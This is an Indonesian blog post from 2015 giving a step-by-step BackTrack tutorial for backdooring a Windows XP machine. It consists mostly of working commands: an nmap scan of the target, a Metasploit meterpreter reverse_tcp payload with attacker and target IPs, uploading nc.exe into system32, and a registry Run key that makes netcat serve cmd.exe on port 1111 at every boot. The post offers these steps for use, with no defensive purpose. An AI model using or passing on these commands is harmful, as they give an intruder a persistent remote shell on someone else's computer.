SELAMAT DATANG DI BLOGGER ZZZZzzzz

Senin, 11 Mei 2015

SCRIP EXPLOIT NC.EXE


Berikut saya akan memeberikan tutorial mengenai BACKDOOR pada BackTrack.


1. Buka terminal pada backtrack dng cara tekan ctrl+alt+t kemudian enter.
kemudian ketikan perintah ifconfig

catat atau ingat IP address nya.

2. lihat IP address target yang menggunakan Windows xp, catat atau ingat IP address nya.

3. Ketikan Perintah  cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
4. ketikan nmap -sS -0 192.168.77.39 pada terminal backtrack, Ip yang kita masukkan adalah IP pada Windows / Target, Jika berhasil akan muncul seperti berikut :


5. buka terminal baru kemudian ketikan msfconsole, setelah itu muncul seperti berikut :

6. Ketikan set payload windows/meterpreter/reverse_tcp
7. set lhost 192.168.77.12 ( IP pada backtrack)
8. set rhost 192.168.77.8 ( IP Target)
9. ketikan exploit, maka akan tampil seperti berikut :


10.  upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\

11. enumkey -k HKLM\software\Microsoft\\Windows\\CurrentVersion\\RUN

12. reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe" 



13. Sekarang kita eksekusi komputer targetdengan merestart komputer nya, ketikan reboot, jika berhasil maka hasilnya seperti ini.



Berikut link jika ingin lebih jelas.